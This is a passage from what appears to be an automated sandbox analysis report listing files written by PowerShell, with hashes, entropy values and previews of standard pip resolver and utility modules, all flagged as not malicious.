                                                                                                    Preview:........=.Cf01..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-..d.d.l.m/Z/..e.r.d.d.l0m1Z2..e2e-e,e3f.....Z1..e.jh..................e5........Z6..G.d...d.e"........Z.d.d.d.e.e3....d.e.e.e3....e7f.....f.d...Z8d.e.e3e.f.....d.e.e.e3....e7f.....d.e.e7e3f.....f.d...Z9y.)......N)...TYPE_CHECKING..Dict..List..Optional..Set..Tuple..cast....canonicalize_name)...BaseReporter..ResolutionImpossible)...Resolver)...DirectedGraph)...WheelCache)...PackageFinder)...RequirementPreparer)...install_req_extend_extras)...InstallRequirement)...RequirementSet)...BaseResolver..InstallRequirementProvider)...PipProvider)...PipDebuggingReporter..PipReporter)...get_requirement.....)...Candidate..Requirement)...Factory)...Resultc............................e.Z.d.Z.h.d...Z..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5173
                                                                                                    Entropy (8bit):4.645730040215515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:GKgz+pKea9Gmpnhf5iSyYdTrVBgk29G7edvdssT6F4NgkQbpKDgkUq1us57IxCXO:OzWwGmpnhf5iSyYdTrVmcenjOu0+baqU
                                                                                                    MD5:0F2D852DECDCE2078DCA1F3144E0242E
                                                                                                    SHA1:15B46DD6A5E1D47D7D12E4F5C7FC7DCC10A468FC
                                                                                                    SHA-256:8E0E423A61CB86604828E47EE2CA5D243DE3C942D86B505DB2A881BB66099C9E
                                                                                                    SHA-512:757B7C156AAC53F65B29995FD00F1A0A4A7D22E5DA679667AEF1DDFF230ED830537A07B1799BCC103C8E1852183FCF611FB9292CFC9E7A32E4ED6B979A090926
                                                                                                    Malicious:false
                                                                                                    Preview:from typing import FrozenSet, Iterable, Optional, Tuple, Union..from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import NormalizedName.from pip._vendor.packaging.version import LegacyVersion, Version..from pip._internal.models.link import Link, links_equivalent.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.hashes import Hashes..CandidateLookup = Tuple[Optional["Candidate"], Optional[InstallRequirement]].CandidateVersion = Union[LegacyVersion, Version]...def format_name(project: NormalizedName, extras: FrozenSet[NormalizedName]) -> str:. if not extras:. return project. extras_expr = ",".join(sorted(extras)). return f"{project}[{extras_expr}]"...class Constraint:. def __init__(. self, specifier: SpecifierSet, hashes: Hashes, links: FrozenSet[Link]. ) -> None:. self.specifier = specifier. self.hashes = hashes. self.links = links.. @classmethod. def empt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21052
                                                                                                    Entropy (8bit):4.512854307945884
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:UVLfjKLbZ4P7blhTn7AT70VWPPIyBTrMM/cRVBZSPGt48G1LGQvdLsJBBMaz6DwB:Uw54Pnr7i70OVTkvN48yDdYV6wFNWWJf
                                                                                                    MD5:CD398AAF4525485F7972AB17AEE950C8
                                                                                                    SHA1:2BB311BBD7F8883F2F818863093863106280D462
                                                                                                    SHA-256:D7D2A2F753E8F8C4B10649C621F38691A5A415D3B39CDD16FE72AFEE32F6F0BD
                                                                                                    SHA-512:4E9731E8DB9AB343F7F228744C4F3F8975432EFAC8697F348C4EFDE92A2560E5152DD38C858FAC15DB430046E7ED6043EA5C7F3F2C9713C2A1A59A1CB6F4FEC9
                                                                                                    Malicious:false
                                                                                                    Preview:import logging.import sys.from typing import TYPE_CHECKING, Any, FrozenSet, Iterable, Optional, Tuple, Union, cast..from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.packaging.version import Version..from pip._internal.exceptions import (. HashError,. InstallationSubprocessError,. MetadataInconsistent,.).from pip._internal.metadata import BaseDistribution.from pip._internal.models.link import Link, links_equivalent.from pip._internal.models.wheel import Wheel.from pip._internal.req.constructors import (. install_req_from_editable,. install_req_from_line,.).from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.direct_url_helpers import direct_url_from_link.from pip._internal.utils.misc import normalize_version_info..from .base import Candidate, CandidateVersion, Requirement, format_name..if TYPE_CHECKING:. from .factory import Factory..logger = logging.getLogger(__name__)..BaseCandidate = Union[.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32292
                                                                                                    Entropy (8bit):4.255055335176978
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:68JR56HreGl3X0Cp7IiSCqaSbOJZHqtWSZ9pkqhYACZ1Y7X3vH24k:6H/p7I67KnLOGX3vH2
                                                                                                    MD5:3F53DA705335C523B60CE428CA6DF3D6
                                                                                                    SHA1:4F32A162518B6317878FAC1FB01B8647F715D940
                                                                                                    SHA-256:BEAAA4FA18DC85D85287059575E5B6FC0FB965B94B844FE70BFBF7321CF84AF7
                                                                                                    SHA-512:0E6E78F6F6A28FDF87DFA162A7E7919C8E17DAE539210E381B10139D4A582DA45BF10B6DBA00C0B0B8A4C287BCC395D71B1191B3FE217370CA685EF7B02BD4B3
                                                                                                    Malicious:false
                                                                                                    Preview:import contextlib.import functools.import logging.from typing import (. TYPE_CHECKING,. Dict,. FrozenSet,. Iterable,. Iterator,. List,. Mapping,. NamedTuple,. Optional,. Sequence,. Set,. Tuple,. TypeVar,. cast,.)..from pip._vendor.packaging.requirements import InvalidRequirement.from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.resolvelib import ResolutionImpossible..from pip._internal.cache import CacheEntry, WheelCache.from pip._internal.exceptions import (. DistributionNotFound,. InstallationError,. MetadataInconsistent,. UnsupportedPythonVersion,. UnsupportedWheel,.).from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import BaseDistribution, get_default_environment.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.operations.prepare im
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5705
                                                                                                    Entropy (8bit):4.505216978095506
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ur4l0ct8kYS/bHXBRln6cYzjAfMuMcM8Z+79jAfLuMcXs3VkeezJrW4jAfrc3gwR:Bfz3yeTxcQ7ZQ7x
                                                                                                    MD5:D849F61FDD0534F82B95C28C80FBCC53
                                                                                                    SHA1:6E872AD864F5642639E2E2C625C0005269D472BD
                                                                                                    SHA-256:86F2F71E86BD55A628FAA10E664062D88AB0DB9D540F13F3FAE30755A5A62E91
                                                                                                    SHA-512:6FD6D88439B8E00BC0F1198B7F971EEC248EF5870016CB1ED1B52FDC376202E217D6B21E904A774ABEBFF481862A2ECE8FE087EDF7C55CB0D70AC48F997E1D0D
                                                                                                    Malicious:false
                                                                                                    Preview:"""Utilities to lazily create and visit candidates found...Creating and visiting a candidate is a *very* costly operation. It involves.fetching, extracting, potentially building modules from source, and verifying.distribution metadata. It is therefore crucial for performance to keep.everything here lazy all the way down, so we only touch candidates that we.absolutely need, and not "download the world" when we only need one version of.something.."""..import functools.from collections.abc import Sequence.from typing import TYPE_CHECKING, Any, Callable, Iterator, Optional, Set, Tuple..from pip._vendor.packaging.version import _BaseVersion..from .base import Candidate..IndexCandidateInfo = Tuple[_BaseVersion, Callable[[], Optional[Candidate]]]..if TYPE_CHECKING:. SequenceCandidate = Sequence[Candidate].else:. # For compatibility: Python before 3.9 does not support using [] on the. # Sequence class.. #. # >>> from collections.abc import Sequence. # >>> Sequence[str]. #
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9824
                                                                                                    Entropy (8bit):4.433835668397495
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:vsVpuo0z0KlrlTlWD/7UrXQSgj6WyoZmQbEKzl6lCEPCACW:v2ujyD/7HSgmJoZFECZACW
                                                                                                    MD5:273EFD245287D4EC323A02EF05E983F7
                                                                                                    SHA1:76C0F41ACA7E9F66646B58EC015C160EF21E4A36
                                                                                                    SHA-256:E2DDB78AF8EBBAA33A84A057D4AA46893B7E3381C68517199C62D5D1CD352BB5
                                                                                                    SHA-512:E99EC829AF19E4E0B29B16C5B9B9F4856A9578EA6239AE07A328A59F09DA490E6E9B130D0BD704BD87F23B6883BC22B86EA63E722B9A6B324A7D9503A2106342
                                                                                                    Malicious:false
                                                                                                    Preview:import collections.import math.from typing import (. TYPE_CHECKING,. Dict,. Iterable,. Iterator,. Mapping,. Sequence,. TypeVar,. Union,.)..from pip._vendor.resolvelib.providers import AbstractProvider..from .base import Candidate, Constraint, Requirement.from .candidates import REQUIRES_PYTHON_IDENTIFIER.from .factory import Factory..if TYPE_CHECKING:. from pip._vendor.resolvelib.providers import Preference. from pip._vendor.resolvelib.resolvers import RequirementInformation.. PreferenceInformation = RequirementInformation[Requirement, Candidate].. _ProviderBase = AbstractProvider[Requirement, Candidate, str].else:. _ProviderBase = AbstractProvider..# Notes on the relationship between the provider, the factory, and the.# candidate and requirement classes..#.# The provider is a direct implementation of the resolvelib class. Its role.# is to deliver the API that resolvelib expects..#.# Rather than work with completely abstract "requirement" and "can
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3100
                                                                                                    Entropy (8bit):4.472154934320961
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:/PodCLtMjcwsHohgChCUG06SZh6HohRzorohcu:noIEb
                                                                                                    MD5:669B50941F26A76BD2F0110DA53829E4
                                                                                                    SHA1:E297B2B1FE62E181946180F25D71BEC8D7F2EF90
                                                                                                    SHA-256:6059BD850BF3E031426E365E153439EA14F3DC073E9830671E478D455BCC1CB6
                                                                                                    SHA-512:E0F46E49ABBC8E4BF295D2D7C2DCEDFD87588806E56B75EC111F2DDAAD0B237DA888A383B1004F771985F3C1AE9FA4B89072CE0A5D7341A7CA3F5B7254062D3F
                                                                                                    Malicious:false
                                                                                                    Preview:from collections import defaultdict.from logging import getLogger.from typing import Any, DefaultDict..from pip._vendor.resolvelib.reporters import BaseReporter..from .base import Candidate, Requirement..logger = getLogger(__name__)...class PipReporter(BaseReporter):. def __init__(self) -> None:. self.reject_count_by_package: DefaultDict[str, int] = defaultdict(int).. self._messages_at_reject_count = {. 1: (. "pip is looking at multiple versions of {package_name} to ". "determine which version is compatible with other ". "requirements. This could take a while.". ),. 8: (. "pip is still looking at multiple versions of {package_name} to ". "determine which version is compatible with other ". "requirements. This could take a while.". ),. 13: (. "This is taking longer than usual. You might need to provide ".
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5696
                                                                                                    Entropy (8bit):4.5531229702159175
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:k6ipKl5ohERsedlikilikBrbpKboohw6eabbpKpoh5S8pqRdvOlxwukbqm7hkL4j:AX0kkaYwe0MYjsnVW
                                                                                                    MD5:4E1972F212E51EF4A6C710CEF867B53D
                                                                                                    SHA1:2D0AE87422662F0C8DA9367FC8DFC8D3237A1913
                                                                                                    SHA-256:FA424E34FD168C37DD4EF040B36BD45CF8009CEC8D2011005D8E1BEF6A20B4F1
                                                                                                    SHA-512:6010B5B7226CE8478E8AA8AC2E0CAED3C543E72E2D2C689CA655EC4FF5469B59FF7C7614302B595DB2BA541A46A9519B4E1D7B9F41E4D02E953E14782360485D
                                                                                                    Malicious:false
                                                                                                    Preview:from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name..from pip._internal.req.constructors import install_req_drop_extras.from pip._internal.req.req_install import InstallRequirement..from .base import Candidate, CandidateLookup, Requirement, format_name...class ExplicitRequirement(Requirement):. def __init__(self, candidate: Candidate) -> None:. self.candidate = candidate.. def __str__(self) -> str:. return str(self.candidate).. def __repr__(self) -> str:. return f"{self.__class__.__name__}({self.candidate!r})".. @property. def project_name(self) -> NormalizedName:. # No need to canonicalize - the candidate did this. return self.candidate.project_name.. @property. def name(self) -> str:. # No need to canonicalize - the candidate did this. return self.candidate.name.. def format_for_error(self) -> str:. return self.candidate.forma
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12592
                                                                                                    Entropy (8bit):4.328792455404742
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:gN0R+Ax5l1HPLlZ/pS9DBFYcIaJbY0FRB314LCLbo2s8T4EBdvMuhz:gN0R+cLpS1BRxXX1BbYm4ydku9
                                                                                                    MD5:C966A718961B0E444857373050B09EE2
                                                                                                    SHA1:1FD155FCFA0A1547F514E35C4013A1C214E64D6D
                                                                                                    SHA-256:9CB24EB15304562DA0414549A1414A31901EBB67FB19132318CBCD496CB3D017
                                                                                                    SHA-512:AAFC4B6926C19AD425864209D0BD84EC4B8DA84EFDD9C08E8607D83B06603950E030E9833618375C3CEC50895512563B9C912DDD0E06F5FE751049A29C062190
                                                                                                    Malicious:false
                                                                                                    Preview:import contextlib.import functools.import logging.import os.from typing import TYPE_CHECKING, Dict, List, Optional, Set, Tuple, cast..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.resolvelib import BaseReporter, ResolutionImpossible.from pip._vendor.resolvelib import Resolver as RLResolver.from pip._vendor.resolvelib.structs import DirectedGraph..from pip._internal.cache import WheelCache.from pip._internal.index.package_finder import PackageFinder.from pip._internal.operations.prepare import RequirementPreparer.from pip._internal.req.constructors import install_req_extend_extras.from pip._internal.req.req_install import InstallRequirement.from pip._internal.req.req_set import RequirementSet.from pip._internal.resolution.base import BaseResolver, InstallRequirementProvider.from pip._internal.resolution.resolvelib.provider import PipProvider.from pip._internal.resolution.resolvelib.reporter import (. PipDebuggingReporter,. PipReporter,.).from pip._inte
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8378
                                                                                                    Entropy (8bit):4.5483528725345925
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:8A4VU/4+r8L9DC8PVjXC6gAiOlYNyT1mgC5tlyspvIIjN5U:8A4VU/PriPVjXC6xGT5tndnU
                                                                                                    MD5:CA21C210EFA5760DB395D16076E1ABE5
                                                                                                    SHA1:34B9904DA71D74F6EE47026974C5B4134789ABA4
                                                                                                    SHA-256:B1AC502C1F14CC816D31272ABB2B46D744CE4EC61514943F9A45B5358FB8EB01
                                                                                                    SHA-512:7F848DCFFF740A943A036D086571E0CD6979F08C293C92745770A40A5050343C3263ECD38E2E42EE16BEEA975A11BE6E0C8B0E61DEE8A7F35E207E3ED53E9A69
                                                                                                    Malicious:false
                                                                                                    Preview:import datetime.import functools.import hashlib.import json.import logging.import optparse.import os.path.import sys.from dataclasses import dataclass.from typing import Any, Callable, Dict, Optional..from pip._vendor.packaging.version import parse as parse_version.from pip._vendor.rich.console import Group.from pip._vendor.rich.markup import escape.from pip._vendor.rich.text import Text..from pip._internal.index.collector import LinkCollector.from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import get_default_environment.from pip._internal.metadata.base import DistributionVersion.from pip._internal.models.selection_prefs import SelectionPreferences.from pip._internal.network.session import PipSession.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.entrypoints import (. get_best_invocation_for_this_pip,. get_best_invocation_for_this_python,.).from pip._internal.utils.filesystem import adjacent_tmp_file, check_path_ow
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):201
                                                                                                    Entropy (8bit):4.778035309005675
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:rH/cl/VneGn23d6oAreKAyQ6Iaatgem/l:T0tVevImbyQjaatHmt
                                                                                                    MD5:57097DACE699F4CDF780788248A86D50
                                                                                                    SHA1:CDD4966273B88EDFE08DB5206ADF3B1F4662A0C6
                                                                                                    SHA-256:6F400A0DEAB7D8CAE2CDE39B84CED9B4A730B286C2E490EED8CEBB9156B47A98
                                                                                                    SHA-512:F1998CC157566AF635F46AE13C9EC5527FB31009E6F3E049796E6AB7B7D064BA2E194492C3D59238D1DA6BA330610A8535B22B96FFD088635DF7B5889863BCB3
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................y.).N..r..........hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/__init__.py..<module>r........s.........r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4542
                                                                                                    Entropy (8bit):5.611527483242487
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:2BlPQNssZQHToFiaOMlmD5mSLczvHHlHm4s/jw/1iPY:2B+QHTIiPVLchG4sM1iPY
                                                                                                    MD5:6A752BF861C820AC9B48A158F36EDFE5
                                                                                                    SHA1:81E9BE1CE553FAD897E0E492FA3B94D2B7684B87
                                                                                                    SHA-256:4AD7E3E9B0701854BBE5E67956BEFCD1031E2D40FE12C75C81AF09837F69DBDF
                                                                                                    SHA-512:A3E84861AC8AB7A2811046963C33A6B92085B251B24990443748D5B63F08CA667265F6D19BC02CB06D4DC796BE98A42B367F7B6682460C5769A073DE900D9180
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................|.....d.Z.d.d.l.Z.d.d.l.Z.d...Z.e.j...................d...........Z.e.j...................e.........d...........Z.d...Z.d...Z.y.).a....Functions brought over from jaraco.text...These functions are not supposed to be used within `pip._internal`. These are.helper functions brought over from `jaraco.text` to enable vendoring newer.copies of `pkg_resources` without having to vendor `jaraco.text` and its entire.dependency cone; something that our vendoring setup is not currently capable of.handling...License reproduced from original source below:..Copyright Jason R. Coombs..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1872
                                                                                                    Entropy (8bit):5.215609435001079
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:pcIe2uK6/KNOiVJBv8lj/UoF3jbYkxOR4v/kG42XZ/b9lRGXXhuVO/wClJQwr:pVe2TqKbDi/nzkkq49NxbHCxtF7Qwr
                                                                                                    MD5:0B1D6DE347D89A1A601939117D4564BA
                                                                                                    SHA1:DFD3E17B2BB8E7CA7C9CD7FDBB2618AC61D304D0
                                                                                                    SHA-256:A1064CD1CC3EE368BFEAE64672D6104EFB2A8B379182C5FB44F9184375200F2B
                                                                                                    SHA-512:76AF580F09262DA0F76E92ED08F14D22E4D24CA72DB3CE20F5C8EDEF3EDE299F22A5E3C9653E5419C72B714A717DA661FB62F582F7A6167555241FAFA446AFD9
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................f.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.Z...G.d...d.e.j...........................Z.d.e.d.e.f.d...Z.d.d...Z.y.).z.Customize logging..Defines custom logger class for the `logger.verbose(...)` method...init_logging() must be called before any other modules that call logging.getLogger.......N)...Any..cast.....c.....................(.....e.Z.d.Z.d.Z.d.e.d.e.d.e.d.d.f.d...Z.y.)...VerboseLoggerzXCustom Logger, defining a verbose log-level.. VERBOSE is between INFO and DEBUG.. ..msg..args..kwargs..returnNc.....................8.......|.j...................t.........|.g.|.....i.|.....S.).N)...log..VERBOSE)...selfr....r....r....s.... .dC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/_log.py..verbosez.VerboseLogger.verbose....s..........t.x.x......6.t..6.v..6..6.....)...__name__..__module__..__qualname__..__doc__..strr....r......r....r....r....r........s(..............7.3....7.s....7.c....7.d....7r....r......
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2416
                                                                                                    Entropy (8bit):5.091136390707263
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:khCwnB0TGH38HgNC25maQ+vl+rylM96ibl9sEtjwjDjF81X:rw32gg2D0rqUjlwrF89
                                                                                                    MD5:96FFC01D282045F6F1E1BE5925C1F3F6
                                                                                                    SHA1:D22D59B2A371CEA668DF27A5A94C2FAB0D1CA259
                                                                                                    SHA-256:AECB3F33E48EFE265B0C64AD305127176971D7B231B27EFB1E528F334BC0A40C
                                                                                                    SHA-512:269FDAD6AF56EF51C6D4E6705085F2AE64D4682F9A4B8B15A6EA26E0E4334378409DC97FA02A865489074A221BA8550195B6D827C3A6F86F973A3632D46B435D
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.f.d...Z.d.d.e.d.e.d.e.f.d...Z.d.d.e.d.e.d.e.f.d...Z.d.e.d.e.e.....f.d...Z.y.).z..This code wraps the vendored appdirs module to so the return values are.compatible for the current pip code base...The intention is to rewrite current usages gradually, keeping the tests pass,.and eventually drop this after all usages are changed.......N)...List)...platformdirs..appname..returnc.....................0.....t.........j...................|.d...........S.).NF)...appauthor)..._appdirs..user_cache_dir).r....s.... .gC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/appdirs.pyr....r........s..........."..".7.e..<..<.......roamingc...........................t.........j...................|.d.|...........}.t.........j...................j...................|.........r.|.S.d.}.|.r t.........j...................j...................|.|.........}.t.........j............
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2219
                                                                                                    Entropy (8bit):5.382442736475346
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:FnzFvqkHP66dm9HGIX8SySMmFW/2XHUx2:FzFvpHy6otG+sSMk4g
                                                                                                    MD5:7C159DD8CC4828D43CC0F41C877CAE85
                                                                                                    SHA1:41300D7E15AB0EF8DA287F4C694F3F6D1DBB0132
                                                                                                    SHA-256:03EDAD7229E989A104B05B1F5C5EEB7DCF30E3E2A3042C419226C427F579ED60
                                                                                                    SHA-512:CDEA131E3805D3E527D2A63AC0B8992B22DEBE7984BF6AE00A0885B678C7BB79E8043629F43A4884813EB6BB00F327CA0C25BC3563BF6A8BFFEDAD79AE9B06C9
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf\...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z...e.j...................e.........Z.d.e.f.d...Z.d.e.d.e.f.d...Z.h.d...Z.e.j...................j...................d.........x.s ..e.j...................d.k(..x.r...e.j ..................d.k(..Z.y.).zKStuff that differs in different Python versions and platform.distributions......N)...get_path_uid..stdlib_pkgs..WINDOWS..returnc.....................<.......d.d.l.}.y.#.t.........$.r...Y.n.w.x.Y.w.d.d.l.m.}...|.S.).Nr....T)...IS_PYOPENSSL)..._ssl..ImportError..pip._vendor.urllib3.utilr....).r....r....s.... .fC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/compat.py..has_tlsr........s*......................................6......s..................pathc..........................t.........t.........d.........rkt.........j...................|.t.........j...................t.........j...................z...........}.t.........j...................|.........j............
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5567
                                                                                                    Entropy (8bit):5.558385879923258
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YkSlZqxsEQLlOTO8E0pFBlfYs4PGOkI/c9XYwTV8KDglzCVD1:YdlkOp+O8E0pjBYCj8ceweKDkm1
                                                                                                    MD5:1E810D28A7917F0ED56178315BD64EA3
                                                                                                    SHA1:B5931506952214886C2C16C8989B9C71BCF128B7
                                                                                                    SHA-256:8EFB6287EB01FDE035356CE6F52B478614FF8B21C0844FB2367A5CAFDC8204AB
                                                                                                    SHA-512:C247EC5346BFFBFC2699818A66FD21B96CA820A4575BB29F7122ACE884FD89E44D2CC8E9F0CDFB98092F5507A2225B30D5D6EE808F6D2FFF43EEC2B4A604526C
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................x.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.j...................d.........Z.d.e.e.d.f.....d.e.f.d...Z.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z.d.e.e.e.........d.e.e.e.........f.d...Z.d.e.d.e.f.d...Z...d.d.e.e.....d.e.e.....d.e.f.d...Z.........d.d.e.e.....d.e.e.e.........d.e.e.....d.e.e.e.........d.e.e.....f.d...Z.y.).z3Generate and work with PEP 425 Compatibility Tags.......N)...List..Optional..Tuple)...PythonVersion..Tag..compatible_tags..cpython_tags..generic_tags..interpreter_name..interpreter_version..mac_platformsz.(.+)_(\d+)_(\d+)_(.+)..version_info...returnc.....................F.....d.j...................t.........t.........|.d.d...................S.).N.......)...join..map..str).r....s.... .rC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/compatibility_tags.py..version_info_to_nodotr........s..........7.7.3.s.L...!..,..-.............a
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):690
                                                                                                    Entropy (8bit):5.11299985346228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:GHSB1aw8/Mdhg7OXeEImbskqusF2pOYmPB0X+johDyU:GH4aXUdAOuE3N4MEYmmX+chd
                                                                                                    MD5:11194453F03E3820F726DFE8772EF444
                                                                                                    SHA1:0E5BA0D2E72589F2E12DF0162313926D2D412D77
                                                                                                    SHA-256:18366E3E5462352A39EFDD9E9D2D175ADC72C885277FA5264E07234E95164E59
                                                                                                    SHA-512:24AEAC90E3C88C6E5A3C22FE9C2108A7DA330C8EAB513346C078231F4936665BD215E62F47763120124CA7400FA216A2B51B340E348900206A7D566B94C1D61A
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................(.....d.Z.d.d.l.Z.d.e.d.e.d.e.d.e.f.d...Z.y.).z.For when pip wants to check the date or time.......N..year..month..day..returnc.....................v.....t.........j...................j...........................}.t.........j...................|.|.|.........}.|.|.kD..S.).N)...datetime..date..today).r....r....r....r......givens.... .hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/datetime.py..today_is_later_thanr........s0.........M.M........!.E....M.M.$...s..+.E....5.=........)...__doc__r......int..boolr......r....r......<module>r........s0........................c......#......C......D.....r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4192
                                                                                                    Entropy (8bit):5.605151830916841
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:8IziDC7ITvgezuOCykDPEMUor6fmZVhnyxnJ1:8IGDCETv7zuOlctpVIxn/
                                                                                                    MD5:1F23C07D635DA77B0DEC1AF07C964D27
                                                                                                    SHA1:DCD465264EE9F07124A2F6A9DA8C50DDCEEFB608
                                                                                                    SHA-256:2E9969F3400C8905AD20B02B6B93CD7FE60F311F775F529AA43337637DD93864
                                                                                                    SHA-512:36594571BAB4FBDAB47B692BE03E40DF2FEA94A1EFBC166D6B6F3EA6828795B4B1FAE650AECC35C40C682567C9934F49BAB9487189C4C8D1C6B4B064E4BC098F
                                                                                                    Malicious:false
